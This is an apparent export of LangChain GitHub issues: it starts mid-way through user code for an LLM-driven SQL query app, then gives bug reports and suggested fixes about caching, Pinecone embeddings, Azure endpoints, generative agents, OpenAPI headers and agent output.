column_name in column_names] sorted_result_data.append(sorted_row) result_data = sorted_result_data column_names = get_chinese_col_names(column_names, conn) inserted_id = row.ID # 获取已经存在的行的ID used_time = round(time.time() - start_time, 2) # 计算查询耗时 refresh_date = datetime.datetime.now() # 获取当前时间 result_records = len(result_data) # 获取结果记录数 isAdd = False # 更新RefreshDate,ResultRecords和UsedTime字段 update_stmt = AiQuery.update(). 
\ where(AiQuery.columns.ID == inserted_id). \ values(RefreshDate=refresh_date, ResultRecords=result_records, UsedTime=used_time, Result_data=json.dumps(result_data, cls=DecimalEncoder)) conn.execute(update_stmt) else: # 如果没有结果,那么执行GPT查询 result = custom_db_chain(query) sql_query = result['result'] sql_query = add_table_prefix_to_columns(sql_query, custom_table_info) print(sql_query) result_proxy = conn.execute(sql_query) # 将 LegacyRow 对象转换为字典 result_data = [dict(row) for row in result_proxy.fetchall()] column_names = list(result_proxy.keys()) sorted_result_data = [] for resrow in result_data: sorted_row = [resrow[column_name] for column_name in column_names] sorted_result_data.append(sorted_row) result_data = sorted_result_data column_names = get_chinese_col_names(column_names, conn) used_time = round(time.time() - start_time, 2) # 计算查询耗时 result_records = len(result_data) # 获取结果记录数 # 将结果保存到AiQuery表中,包括新的字段 insert_stmt = AiQuery.insert().values(QueryStr=query, SQLStr=sql_query, Column_names=json.dumps(column_names, cls=DecimalEncoder), Result_data=json.dumps(result_data, cls=DecimalEncoder), ResultRecords=result_records, UsedTime=used_time) result = conn.execute(insert_stmt) inserted_id = result.inserted_primary_key[0] # 获取新插入的行的ID isAdd = True return jsonify({'isAdd': isAdd, 'column_names': column_names, 'result_data': result_data, 'inserted_id': inserted_id}) if __name__ == '__main__': app.run(debug=True) tree = ttk.Treeview(root) tree.pack(padx=20, pady=20, fill=tk.X) def on_click(): query = entry.get() result = custom_db_chain(query) sql_query = result['result'] engine = create_engine(f"mssql+pymssql://{user_name}:{urlquote(psw)}@{ip}/{database}") with engine.connect() as conn: result_proxy = conn.execute(sql_query) # 同样,将 LegacyRow 对象转换为字典 result_data = [dict(row) for row in result_proxy.fetchall()] column_names = list(result_proxy.keys()) column_names = get_chinese_col_names(column_names, conn) # 新增:清空 Treeview for item in tree.get_children(): tree.delete(item) 
# 新增:显示查询结果 display_table(tree, column_names, result_data) # 新增:显示查询结果 # display_table(tree, [header["label"] for header in dataTable["headers"]], dataTable["contents"]) # except Exception as err: # print("Error occurred:", err) button = ttk.Button(root, text="Chat", command=on_click) button.pack(padx=20, pady=20) text = tk.Text(root, height=10, width=60, font=("Arial", 14)) text.pack(padx=20, pady=20) root.mainloop()
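The `sql_utils.add_table_prefix_to_columns` helper imported above is not shown, so here is one possible standalone sketch of the idea it names (not the author's implementation): qualify bare `[Column]` references with their owning table, given a table-to-columns map. Ambiguous columns are resolved to the first owning table, which is only safe when the joins equate them, as they do in the failing query.

```python
import re

def add_table_prefix(sql: str, table_columns: dict) -> str:
    """Prefix bare [Column] references with their owning table.

    table_columns maps table name -> list of its column names.
    Already-qualified [Table].[Column] references are left untouched.
    """
    owners = {}
    for table, cols in table_columns.items():
        for col in cols:
            owners.setdefault(col, []).append(table)

    def repl(match):
        col = match.group(1)
        owners_of = owners.get(col)
        if owners_of:
            # Ambiguous columns take the first owner -- fine for equi-joins,
            # wrong in general; a real implementation should parse the joins.
            return f"[{owners_of[0]}].[{col}]"
        return match.group(0)

    # The lookbehind skips the [Col] half of an already-qualified [Tab].[Col].
    return re.sub(r"(?<!\]\.)\[(\w+)\]", repl, sql)


table_columns = {
    "JBStore": ["StoreNo", "StoreName"],
    "CKCurrStore": ["StoreNo", "GoodsNo", "Quantity"],
}
sql = ("SELECT [StoreName], [Quantity] FROM [JBStore] "
       "JOIN [CKCurrStore] ON [JBStore].[StoreNo] = [CKCurrStore].[StoreNo]")
prefixed = add_table_prefix(sql, table_columns)
print(prefixed)
```

A more robust alternative is to avoid post-processing entirely and instead instruct the model, in the prompt, to always write fully qualified `[Table].[Column]` names in multi-table queries.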
Handling Errors in SQL Statements That Involve Multiple Table Joins
https://api.github.com/repos/langchain-ai/langchain/issues/4832/comments
2
2023-05-17T04:01:52Z
2024-02-07T19:07:29Z
https://github.com/langchain-ai/langchain/issues/4832
1,713,063,873
4,832
[ "langchain-ai", "langchain" ]
### System Info Langchain Version: 0.0.170 Platform: Linux x86_64 Python: 3.9 ### Who can help? @SimFG _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Steps to reproduce behaviour: ```python import langchain from gptcache import Cache from gptcache.adapter.api import init_similar_cache from langchain.cache import GPTCache from langchain.llms import OpenAI # Avoid multiple caches using the same file, causing different llm model caches to affect each other def init_gptcache(cache_obj: Cache, llm: str): init_similar_cache(cache_obj=cache_obj, data_dir=f"similar_cache_{llm}") langchain.llm_cache = GPTCache(init_gptcache) llm = OpenAI(model_name="text-davinci-002", temperature=0.2) llm("tell me a joke") # llm_string is the serialized model config used as the cache key print("cached:", langchain.llm_cache.lookup("tell me a joke", llm_string)) # cached: None ``` The cache won't hit. ### Expected behavior The gptcache should have a hit
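One detail worth noting: the llm string passed to the init callback is a serialized parameter dump, which may contain characters that are awkward in a directory name, so hashing it is a safer way to derive a unique, stable `data_dir` per model. A standalone sketch (the hashing choice here is mine, not GPTCache's):

```python
import hashlib

def cache_dir_for(llm_string: str) -> str:
    """Derive a stable, filesystem-safe cache directory name per llm config."""
    digest = hashlib.sha256(llm_string.encode("utf-8")).hexdigest()[:16]
    return f"similar_cache_{digest}"

# Same config -> same dir; different config -> different dir.
print(cache_dir_for("[('model_name', 'text-davinci-002'), ('temperature', 0.2)]"))
```

With this, `init_gptcache` can use `data_dir=cache_dir_for(llm)` so each model configuration reliably maps to one cache directory instead of a fresh `cache_obj` per run.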
GPTCache keeps creating a new gptcache cache_obj
https://api.github.com/repos/langchain-ai/langchain/issues/4830/comments
0
2023-05-17T03:26:37Z
2023-05-18T16:42:38Z
https://github.com/langchain-ai/langchain/issues/4830
1,713,035,478
4,830
[ "langchain-ai", "langchain" ]
### System Info langchain version 0.0.171 python version 3.9.13 macos ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [X] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction This is a problem with the generative agents. To reproduce, please follow the tutorial outlined here: https://python.langchain.com/en/latest/use_cases/agent_simulations/characters.html When you get to the following line of code you will get an error: `print(tommie.get_summary(force_refresh=True))` ``` File ~/.pyenv/versions/3.9.13/lib/python3.9/site-packages/langchain/retrievers/time_weighted_retriever.py:14, in _get_hours_passed(time, ref_time) 12 def _get_hours_passed(time: datetime.datetime, ref_time: datetime.datetime) -> float: 13 """Get the hours passed between two datetime objects.""" ---> 14 return (time - ref_time).total_seconds() / 3600 TypeError: unsupported operand type(s) for -: 'datetime.datetime' and 'NoneType' ``` ### Expected behavior The ref time should be a datetime and Tommie's summary should be printed.
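A workaround until a fix lands is to guard `_get_hours_passed` (or monkey-patch the retriever) so a missing reference time falls back to "just now" instead of subtracting `None`. A standalone sketch of the guarded helper; treating a missing `ref_time` as zero hours passed is my assumption, not the library's documented behavior:

```python
import datetime

def get_hours_passed(time, ref_time):
    """Hours between two datetimes; a missing ref_time counts as 'just now'."""
    if ref_time is None:
        ref_time = time  # memory was never accessed -> zero hours passed
    return (time - ref_time).total_seconds() / 3600

now = datetime.datetime(2023, 5, 17, 12, 0)
print(get_hours_passed(now, now - datetime.timedelta(hours=2)))  # 2.0
print(get_hours_passed(now, None))  # 0.0 instead of a TypeError
```

The root cause is presumably a memory document whose `last_accessed_at` was never set; ensuring the retriever stamps documents on insertion would fix it at the source.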
TypeError: unsupported operand type(s) for -: 'datetime.datetime' and 'NoneType'
https://api.github.com/repos/langchain-ai/langchain/issues/4825/comments
7
2023-05-17T02:24:24Z
2023-05-22T22:47:05Z
https://github.com/langchain-ai/langchain/issues/4825
1,712,990,151
4,825
[ "langchain-ai", "langchain" ]
### System Info LangChain 0.0.171, Python 3.10.10 running the code: index = pinecone.Index('ssk') print(index.describe_index_stats()) vectorstore = Pinecone(index=index, embedding_function=OpenAIEmbeddings.embed_query, text_key='text') documents = vectorstore.similarity_search('How can several llama_indexes be composed?') print(index.describe_index_stats()) gives the following {'dimension': 1536, 'index_fullness': 0.0, 'namespaces': {'': {'vector_count': 335}}, 'total_vector_count': 335} but gives an error in the vectorstore.similarity_search call --------------------------------------------------------------------------- TypeError Traceback (most recent call last) Cell In[46], line 4 2 print(index.describe_index_stats()) 3 vectorstore = Pinecone(index=index, embedding_function=OpenAIEmbeddings.embed_query, text_key='text') ----> 4 documents = vectorstore.similarity_search('How can several llama_indexes be composed?') File ~/anaconda3/envs/langchain_play/lib/python3.10/site-packages/langchain/vectorstores/pinecone.py:155, in Pinecone.similarity_search(self, query, k, filter, namespace, **kwargs) 136 def similarity_search( 137 self, 138 query: str, (...) 142 **kwargs: Any, 143 ) -> List[Document]: 144 """Return pinecone documents most similar to query. 145 146 Args: (...) 153 List of Documents most similar to the query and score for each 154 """ --> 155 docs_and_scores = self.similarity_search_with_score( 156 query, k=k, filter=filter, namespace=namespace, **kwargs 157 ) 158 return [doc for doc, _ in docs_and_scores] File ~/anaconda3/envs/langchain_play/lib/python3.10/site-packages/langchain/vectorstores/pinecone.py:115, in Pinecone.similarity_search_with_score(self, query, k, filter, namespace) 113 if namespace is None: 114 namespace = self._namespace --> 115 query_obj = self._embedding_function(query) 116 docs = [] 117 results = self._index.query( 118 [query_obj], 119 top_k=k, (...) 
122 filter=filter, 123 ) TypeError: OpenAIEmbeddings.embed_query() missing 1 required positional argument: 'text' ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction run code like: index = pinecone.Index('ssk') print(index.describe_index_stats()) vectorstore = Pinecone(index=index, embedding_function=OpenAIEmbeddings.embed_query, text_key='text') documents = vectorstore.similarity_search('How can several llama_indexes be composed?') ### Expected behavior for a valid pinecone index, expect documents to be populated without error
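The traceback points at the root cause: `OpenAIEmbeddings.embed_query` is passed as an *unbound* class attribute, so when Pinecone calls it, the query string is consumed by `self` and `text` comes up missing. The mechanism can be reproduced without any external service; the `FakeEmbeddings` class below is only a stand-in for illustration, not a LangChain API:

```python
# Minimal illustration of the bug: passing an unbound method shifts every
# argument by one, so the query string lands in `self` and `text` is missing.
class FakeEmbeddings:
    def embed_query(self, text):
        return [float(len(text))]  # stand-in for a real embedding vector

try:
    FakeEmbeddings.embed_query("hello")          # unbound: 'text' is missing
except TypeError as e:
    print("unbound call fails:", e)

vector = FakeEmbeddings().embed_query("hello")   # bound: works as expected
print(vector)  # → [5.0]
```

The likely fix on the calling side is to pass a bound method from an instance, e.g. `embedding_function=OpenAIEmbeddings().embed_query` (note the parentheses) instead of `OpenAIEmbeddings.embed_query`.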
pinecone.similarity_search -> TypeError: OpenAIEmbeddings.embed_query() missing 1 required positional argument: 'text'
https://api.github.com/repos/langchain-ai/langchain/issues/4821/comments
4
2023-05-17T01:03:52Z
2024-03-23T14:37:37Z
https://github.com/langchain-ai/langchain/issues/4821
1,712,933,277
4,821
[ "langchain-ai", "langchain" ]
### System Info langchain 171, gpt4 model in a region, text-embedding-ada002 in another ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Create an embedding on ADA002 in a region, with os.environ settings : os.environ["OPENAI_API_TYPE"] = "azure" os.environ["OPENAI_API_KEY"] = "" os.environ["OPENAI_API_BASE"] = "" os.environ["OPENAI_API_VERSION"] = "2023-03-15-preview" embeddings = OpenAIEmbeddings(model="") text = "This is a test document." embeddings.embed_query(text) this works. If I try to add an LLM for later doc retrieval, like below, I get the following exception: Create an embedding on ADA002 in a region, with os.environ settings : os.environ["OPENAI_API_TYPE"] = "azure" os.environ["OPENAI_API_KEY"] = "" os.environ["OPENAI_API_BASE"] = "" os.environ["OPENAI_API_VERSION"] = "2023-03-15-preview" embeddings = OpenAIEmbeddings(model="") llm = AzureChatOpenAI( openai_api_key = "", openai_api_base = "", model_name="" ) #result = llm([HumanMessage(content="Translate this sentence from English to French. I love programming.")]) #print(result) text = "This is a test document." embeddings.embed_query(text) Exception has occurred: InvalidRequestError The API deployment for this resource does not exist. If you created the deployment within the last 5 minutes, please wait a moment and try again. ### Expected behavior I should be able to have two distinct GPT and ADA setups not on the same API base.
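The suspected cause is that both wrappers write their settings into the shared global `openai` module state, so whichever class is constructed last wins and the other client calls the wrong endpoint. A pure-Python illustration of that mechanism (all class and field names below are stand-ins, not the real openai/langchain API):

```python
# Last-writer-wins on shared module-level state: constructing the chat client
# after the embeddings client redirects embedding requests to the chat base,
# which produces the "deployment does not exist" error.
shared_config = {"api_base": None}  # stands in for the global `openai` module state

class FakeEmbeddings:
    def __init__(self, api_base):
        shared_config["api_base"] = api_base  # constructor mutates the global

    def embed_query(self, text):
        return f"POST {shared_config['api_base']}/embeddings"

class FakeChat:
    def __init__(self, api_base):
        shared_config["api_base"] = api_base  # overwrites the embeddings base

embedder = FakeEmbeddings("https://myembedder.openai.azure.com")
chat = FakeChat("https://mychat.openai.azure.com")

# The embedding request now goes to the chat endpoint:
print(embedder.embed_query("This is a test document."))
```

Until the wrappers stop sharing globals, a workaround is to construct (or reconfigure) the client whose call you are about to make immediately before using it.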
Resource does not exists when using both OpenAIEmbeddings and AzureChatOpenAI in two different Azure region/ endpoints
https://api.github.com/repos/langchain-ai/langchain/issues/4819/comments
6
2023-05-16T23:36:25Z
2023-11-03T08:33:02Z
https://github.com/langchain-ai/langchain/issues/4819
1,712,871,337
4,819
[ "langchain-ai", "langchain" ]
### Discussed in https://github.com/hwchase17/langchain/discussions/4817 <div type='discussions-op-text'> <sup>Originally posted by **markanth** May 16, 2023</sup> Under Use Cases -> Code Understanding, you will find: The full tutorial is available below. [Twitter the-algorithm codebase analysis with Deep Lake](https://python.langchain.com/en/latest/use_cases/code/twitter-the-algorithm-analysis-deeplake.html): A notebook walking through how to parse github source code and run queries conversation. [LangChain codebase analysis with Deep Lake](https://python.langchain.com/en/latest/use_cases/code/code-analysis-deeplake.html): A notebook walking through how to analyze and do question answering over THIS code base. In both full tutorials, I think that this line: model = ChatOpenAI(model='gpt-3.5-turbo') # switch to 'gpt-4' should be: model = ChatOpenAI(model_name='gpt-3.5-turbo') (model_name instead of model) </div>
Typo in DeepLake Code Analysis Tutorials
https://api.github.com/repos/langchain-ai/langchain/issues/4818/comments
0
2023-05-16T22:21:09Z
2023-05-17T15:52:24Z
https://github.com/langchain-ai/langchain/issues/4818
1,712,813,069
4,818
[ "langchain-ai", "langchain" ]
### Feature request The LlamaCpp wrapper doesn't implement the get_num_tokens function, so it falls back to a GPT-2 tokenizer and returns a wrong number of tokens ### Motivation - ### Your contribution -
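The requested override can be sketched in a self-contained way. `FakeLlama.tokenize` below is a stand-in for the real `llama_cpp` tokenizer (which takes bytes and returns token ids); the point is only the delegation pattern:

```python
# Sketch: override the generic token counter so it delegates to the model's
# own tokenizer instead of a GPT-2-style fallback estimate.
class FakeLlama:
    def tokenize(self, text_bytes):
        return text_bytes.split()  # toy "tokenizer": whitespace split

class BaseLLM:
    def get_num_tokens(self, text):
        return len(text) // 4      # crude fallback estimate (what happens today)

class LlamaCppLike(BaseLLM):
    def __init__(self, client):
        self.client = client

    def get_num_tokens(self, text):
        # count with the model's real tokenizer instead of the fallback
        return len(self.client.tokenize(text.encode("utf-8")))

llm = LlamaCppLike(FakeLlama())
print(llm.get_num_tokens("count these four tokens"))  # → 4
```

In the actual wrapper this would amount to calling the underlying client's tokenizer on the UTF-8 encoded text and returning the length of the resulting token list.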
Implement get_num_tokens in LlamaCpp
https://api.github.com/repos/langchain-ai/langchain/issues/4815/comments
1
2023-05-16T21:24:51Z
2023-09-10T16:17:04Z
https://github.com/langchain-ai/langchain/issues/4815
1,712,756,362
4,815
[ "langchain-ai", "langchain" ]
### System Info Just working my way through the AutoGPT instructions here https://python.langchain.com/en/latest/use_cases/autonomous_agents/autogpt.html and getting the error: --------------------------------------------------------------------------- ``` ModuleNotFoundError Traceback (most recent call last) Cell In[11], line 4 2 embeddings_model = OpenAIEmbeddings() 3 # Initialize the vectorstore as empty ----> 4 import faiss 6 embedding_size = 1536 7 index = faiss.IndexFlatL2(embedding_size) ModuleNotFoundError: No module named 'faiss' ``` Will update this ticket if I can figure it out. We already have this line further up the code: `from langchain.vectorstores import FAISS ` **Edit**: Ok so I see that there's such a thing as a pip module called faiss. However doing pip install faiss gives me: ``` ERROR: Could not find a version that satisfies the requirement faiss (from versions: none) ERROR: No matching distribution found for faiss ``` **Edit 2**: Ah ok - For windows users you have to install the CPU version of faiss. See here: https://github.com/facebookresearch/faiss/blob/main/INSTALL.md ### Who can help? ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Just follow the steps in the tutorial ### Expected behavior Not sure - perhaps it was meant to be instantiating the FAISS class?
No module named 'faiss'
https://api.github.com/repos/langchain-ai/langchain/issues/4810/comments
2
2023-05-16T19:45:26Z
2023-09-10T16:17:09Z
https://github.com/langchain-ai/langchain/issues/4810
1,712,642,408
4,810
[ "langchain-ai", "langchain" ]
### System Info Langchain version: v0.0.170 Platform: Linux/Debian python: 3.9.2 ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Have an API endpoint configured such that its parameters include both query parameters and headers ![Screenshot_20230517_000552](https://github.com/hwchase17/langchain/assets/79296922/5e7c80ec-998d-4b7b-962e-9eec0f3f9cdb) ### Expected behavior Given the endpoint is something like https://example.com/api, the agent is trying to hit the endpoint in the following way https://example.com/api?Authorization=<token>&ph-org-code=<xxx>&ph-org-type=<xxx>&status=active Here Authorization, ph-org-code, ph-org-type are headers as seen in the spec but they are passed as query parameters in the URL. I also used RequestWrapper to wrap all the above 3 headers separately and provided them at the time of creating the OpenAPI agent, but the agent executor is still not considering those values.
OpenAPI agent treating 'headers' as query parameters for any endpoint in the openapi spec
https://api.github.com/repos/langchain-ai/langchain/issues/4807/comments
1
2023-05-16T18:45:06Z
2023-09-10T16:17:15Z
https://github.com/langchain-ai/langchain/issues/4807
1,712,558,489
4,807
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. How can one use SelfQueryRetriever to query `datetime`, I've added a `datetime` object as string to the metadata, not sure if that is right or if we should use `timestamp`, but things got weird with this prompt: ``` I want to watch a movie rated higher than 8.5 and released today ``` ```json { "query": "", "filter": "and(gt(\"rating\", 8.5), eq(\"released\", \"today\"))" } ``` I'm not sure how to instruct langchain to convert today to a datetime/str. Is there a from/to AttributeInfo so we can convert when saving and loading from the vectorstore? Long story short, how would you guys approach this scenario? Thanks in advance. ### Suggestion: _No response_
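One workable approach (a sketch, not an official LangChain recipe): store dates as numeric Unix timestamps in metadata so the `gt`/`lt`/`eq` comparators work on plain numbers, and resolve relative words like "today" to a timestamp before the filter is built, for example by stating in the attribute description that `released` is a Unix timestamp:

```python
# Store dates as numbers, not strings, so comparator filters behave.
from datetime import datetime, timezone

def to_timestamp(dt: datetime) -> float:
    return dt.replace(tzinfo=timezone.utc).timestamp()

metadata = {
    "rating": 8.6,
    "released": to_timestamp(datetime(2010, 7, 16)),  # instead of a string
}

today = to_timestamp(datetime(2010, 7, 16))
# Numeric equivalent of and(gt("rating", 8.5), eq("released", today)):
matches = metadata["rating"] > 8.5 and metadata["released"] == today
print(matches)  # → True
```

With this convention the attribute description given to the self-query retriever should say something like "release date as a Unix timestamp (seconds)", so the LLM emits a number rather than the literal string "today".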
Question: How to use datetime type with SelfQueryRetriever
https://api.github.com/repos/langchain-ai/langchain/issues/4801/comments
4
2023-05-16T17:49:50Z
2023-11-10T19:38:14Z
https://github.com/langchain-ai/langchain/issues/4801
1,712,469,831
4,801
[ "langchain-ai", "langchain" ]
### Feature request `langchain.llms.LlamaCpp` wraps around `llama_cpp`, which recently added an `n_gpu_layers` argument. It would be great to have it in the wrapper. Current workaround: ``` llm = LlamaCpp(...) state = llm.client.__getstate__() state["n_gpu_layers"] = n_gpu_layers llm.client.__setstate__(state) ``` ### Motivation - ### Your contribution -
Add `n_gpu_layers` arg to langchain.llms.LlamaCpp
https://api.github.com/repos/langchain-ai/langchain/issues/4797/comments
1
2023-05-16T16:16:25Z
2023-05-16T16:18:38Z
https://github.com/langchain-ai/langchain/issues/4797
1,712,335,442
4,797
[ "langchain-ai", "langchain" ]
### Feature request I propose a tool that can extract the content of each section from one `.tex` file or a latex project with multiple `.tex` files. Moreover, the tool is able to filter out unwanted content like figure blocks, labels and comments and output the resulting contents in the form of a python dict as `{<section name>: <content>}`. With this tool, we can extract only the "introduction", "related works" and "conclusion" parts of a paper and shorten the contents by filtering, which is beneficial for effective summarization. We can do the same thing for pdf files with no bookmarks based on [science-parse](https://github.com/allenai/science-parse), which can be set up as a docker server, so we will only need an API to use it. It takes a pdf as input and outputs the metadata and the division of sections in json form. So I propose an API wrapper for that in order to make use of this powerful tool. ### Motivation The original `langchain.text_splitter.LatexTextSplitter` cannot handle multiple .tex files, nor can it filter out content that is not required for text analysis, like comments or figure blocks. Since many source files we download from arxiv.org will be a compressed project that has multiple `.tex` files with a `main.tex` that links them together, we need a way to deal with them. Moreover, when dealing with the source files, some latex blocks are not necessary for text analysis, like figures and comments. By filtering them, we can shorten the contents and reduce the work of LLMs. Moreover, when loading a pdf with no bookmarks, we cannot separate its sections and are forced to use all of them at once. This may not be efficient when it comes to scenarios like `summarization`. So we may need a tool that can divide the pdf file without prior input like bookmarks.
### Your contribution I want to create a PR for [document_loaders](https://github.com/hwchase17/langchain/tree/master/langchain/document_loaders) so there can be a way to load a latex project downloaded from arxiv.org in the form of `tar.gz` or `zip`. Then I want to create a PR for [text_splitter](https://github.com/hwchase17/langchain/blob/master/langchain/text_splitter.py) so I can implement the filtering and extraction for the latex file(s) I obtain from the `document_loaders`. I also want to create an API wrapper for science-parse in the same file, which can take the pdf files as input directly via `pathlib.Path` in the `text_splitter` as another splitting function.
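The core of the proposed extraction can be sketched in a few lines. This is a rough sketch under simplifying assumptions (single-file input, standard `\section{...}` markers); multi-file `\input` resolution and the science-parse wrapper are out of scope here:

```python
# Strip comments, figure environments and labels, then split on \section{...}
# and return {section name: content}.
import re

def strip_noise(tex: str) -> str:
    tex = re.sub(r"(?<!\\)%.*", "", tex)                           # comments
    tex = re.sub(r"\\begin{figure}.*?\\end{figure}", "", tex, flags=re.S)
    tex = re.sub(r"\\label{[^}]*}", "", tex)                       # labels
    return tex

def split_sections(tex: str) -> dict:
    parts = re.split(r"\\section{([^}]*)}", strip_noise(tex))
    # parts = [preamble, name1, body1, name2, body2, ...]
    return {parts[i]: parts[i + 1].strip() for i in range(1, len(parts), 2)}

sample = r"""
\section{Introduction} % a comment
Intro text. \label{sec:intro}
\begin{figure}ignored\end{figure}
\section{Conclusion}
Closing text.
"""
print(split_sections(sample))
```

A real implementation would also need to handle `\subsection`, starred sections, and escaped braces, but the dict-of-sections shape shown here is the proposed output format.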
A tool that can extract and divide sections from one or more .tex and pdf files
https://api.github.com/repos/langchain-ai/langchain/issues/4792/comments
1
2023-05-16T15:34:27Z
2023-09-17T17:17:55Z
https://github.com/langchain-ai/langchain/issues/4792
1,712,267,546
4,792
[ "langchain-ai", "langchain" ]
### Feature request When you call the `add_texts` and `add_documents` methods on a Weaviate instance, it always generates UUIDs for you, which is a neat feature https://github.com/hwchase17/langchain/blob/bee136efa4393219302208a1a458d32129f5d539/langchain/vectorstores/weaviate.py#L137 However, there are specific use cases where you want to generate UUIDs by yourself and pass them via `add_texts` and `add_documents`. Therefore, I'd like to support a `uuids` field in the `kwargs` argument to these methods, and use those values instead of generating new ones inside those methods. ### Motivation Both `add_texts` and `add_documents` methods internally call the [batch.add_data_object](https://weaviate-python-client.readthedocs.io/en/stable/weaviate.batch.html#weaviate.batch.Batch.add_data_object) method of a Weaviate client. The document states as below: > Add one object to this batch. NOTE: If the UUID of one of the objects already exists then the existing object will be replaced by the new object. This behavior is extremely useful when you need to update and delete documents from a known field of the document. First of all, Weaviate expects UUIDv3 and UUIDv5 as UUID formats. You can find the information below: https://weaviate.io/developers/weaviate/more-resources/faq#q-are-there-restrictions-on-uuid-formatting-do-i-have-to-adhere-to-any-standards And UUIDv5 allows you to always generate the same value based on an input string, as if it were a hash algorithm. https://docs.python.org/2/library/uuid.html Let's say you have a unique identifier of the document, and use it to generate your own UUID. This way you can directly update, delete or replace documents without searching the documents by metadata. This will save time, code, network bandwidth and compute resources. ### Your contribution I'm attempting to make a PR.
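The deterministic-UUID part of this request works with the standard library alone. The `uuids=` keyword shown in the comment is the *proposed* interface, not an existing one:

```python
# UUIDv5 is deterministic: the same document key always yields the same UUID,
# so re-ingesting a document replaces the old object instead of duplicating it.
import uuid

doc_keys = ["doc-key-1", "doc-key-2"]
ids = [str(uuid.uuid5(uuid.NAMESPACE_DNS, key)) for key in doc_keys]

# Same input, same UUID, every time:
assert ids[0] == str(uuid.uuid5(uuid.NAMESPACE_DNS, "doc-key-1"))
print(ids)

# Proposed usage (hypothetical kwarg, the subject of this feature request):
# vectorstore.add_texts(texts, metadatas=metadatas, uuids=ids)
```

Since Weaviate replaces objects whose UUID already exists, this turns `add_texts` into an idempotent upsert for documents that carry a stable key.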
Accept UUID list as an argument to add texts and documents into Weaviate vectorstore
https://api.github.com/repos/langchain-ai/langchain/issues/4791/comments
0
2023-05-16T15:31:48Z
2023-05-16T22:26:48Z
https://github.com/langchain-ai/langchain/issues/4791
1,712,263,240
4,791
[ "langchain-ai", "langchain" ]
### System Info I ran the below code `output = agent.run("what is Grass Type which pokemnon has highest speed and lowest speed?")` The above code gave the below output ``` > Entering new AgentExecutor chain... Thought: I need to find the pokemon with the highest and lowest speed that are of type Grass Action: python_repl_ast Action Input: df[df['Type 1'] == 'Grass'][['Name', 'Speed']].sort_values('Speed') Observation: Name Speed 658 Ferroseed 10 651 Foongus 15 659 Ferrothorn 20 207 Sunflora 30 511 AbomasnowMega Abomasnow 30 .. ... ... 556 Serperior 113 607 Whimsicott 116 274 Sceptile 120 551 ShayminSky Forme 127 275 SceptileMega Sceptile 145 [70 rows x 2 columns] Thought: I now know the pokemon with the highest and lowest speed that are of type Grass Final Answer: The Grass Type pokemon with the highest speed is SceptileMega Sceptile with 145 speed, and the Grass Type pokemon with the lowest speed is Ferroseed with 10 speed. > Finished chain. ``` But I don't need the complete output. I only need text which is after Final Answer: i.e. The Grass Type pokemon with the highest speed is SceptileMega Sceptile with 145 speed, and the Grass Type pokemon with the lowest speed is Ferroseed with 10 speed. How to get this output? Any ideas? ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction output = agent.run("what is Grass Type which pokemnon has highest speed and lowest speed?" ### Expected behavior I'm just looking to filter out the output content.
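Two things are worth noting here (a sketch, assuming an already-initialized pandas agent). First, `agent.run(...)` already *returns* only the final answer; the intermediate Thought/Action lines are printed to the console because the agent was created with `verbose=True`, so passing `verbose=False` silences them, e.g. `agent = create_pandas_dataframe_agent(llm, df, verbose=False)`. Second, if you have captured the verbose transcript as a string, the final answer can still be sliced out:

```python
# Extract only the text after "Final Answer:" from a captured transcript.
transcript = (
    "Thought: I now know the answer\n"
    "Final Answer: The Grass Type pokemon with the highest speed is "
    "SceptileMega Sceptile with 145 speed."
)
final = transcript.split("Final Answer:", 1)[1].strip()
print(final)
```

The `split(..., 1)` keeps any later colons in the answer intact, since only the first occurrence of the marker is used as the cut point.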
How to return the text which is after Finished Chain or Final Answer?
https://api.github.com/repos/langchain-ai/langchain/issues/4783/comments
13
